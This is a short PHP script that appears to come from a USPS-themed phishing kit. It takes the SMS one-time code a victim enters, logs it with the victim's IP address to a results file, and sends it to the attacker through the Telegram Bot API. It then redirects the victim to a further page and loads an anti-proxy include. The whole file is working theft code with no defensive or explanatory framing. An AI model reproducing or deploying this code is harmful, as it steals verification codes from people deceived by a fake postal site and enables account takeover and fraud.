<?php 
extract($_REQUEST);
include "../id.php";
$sms=$_POST["sim"];
$ipp=$_SERVER['REMOTE_ADDR'];
$message=">>>>>>>>>>>>>|📲| USPS |📲|<<<<<<<<<<<<"."\n"."SMS Code 1 :  ".$sms."\n"."IP :  ".$ipp."\n".">>>>>>>>>>>>>|🔋| USPS |🔋|<<<<<<<<<<<<";
$user_ids=$id;
$filee=fopen("../result.txt",'a');
fwrite($filee,$message."\n");
fclose($filee);
header("location: sms2.php");
foreach($user_ids as $user_id) {
$url='https://api.telegram.org/bot'.$token.'/sendMessage';
$data=array('chat_id'=>$user_id,'text'=>$message);
$options=array('http'=>array('method'=>'POST','header'=>"Content-Type:application/x-www-form-urlencoded\r\n",'content'=>http_build_query($data),),);
$context=stream_context_create($options);
$result=file_get_contents($url,false,$context);
include "../anti/antiproxy1.php";
}
?>